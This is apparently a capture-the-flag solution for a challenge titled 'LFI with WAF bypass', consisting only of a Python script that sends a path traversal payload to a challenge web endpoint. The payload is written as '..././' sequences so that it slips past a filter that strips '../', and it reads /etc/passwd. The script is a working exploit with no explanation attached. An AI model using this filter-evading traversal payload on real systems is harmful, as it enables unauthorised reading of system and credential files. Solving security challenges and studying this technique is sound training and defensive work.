Wizer - Challenge 27 - LFI with WAF bypass

Exploit

import requests

url = "https://chal27-h8745d.vercel.app/api/privacy"


r = requests.post(
    url,
    json={"companyName": "..././..././..././..././..././etc/passwd"},
)


print(r.text)